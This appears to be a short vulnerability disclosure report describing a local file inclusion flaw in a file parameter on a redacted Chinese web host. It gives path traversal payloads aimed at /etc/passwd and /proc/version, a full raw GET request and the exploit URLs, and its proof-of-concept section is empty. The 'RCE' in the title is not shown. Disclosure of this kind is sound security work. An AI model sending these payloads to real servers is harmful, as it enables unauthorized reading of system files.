Local File Inclusion-LFI / RCE
URL:
https://x.redacted.cn/nodev4/static/js-meta?f=
Parameter:
f
Steps to Reproduce:
1. Navigate to this page .
https://x.redacted.cn/nodev4/static/js-meta?f=
2.After navigate inject this payload.
Payload:
/../../../../proc/version
/../../../../etc/passwd
Request:
GET /nodev4/static/js-meta?f=/../../../../etc/passwd HTTP/1.1
Host: x.redacted.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Final URL:
https://x.redacted.cn/nodev4/static/js-meta?f=/../../../../proc/version
https://x.redacted.cn/nodev4/static/js-meta?f=/../../../../etc/passwd
POC:
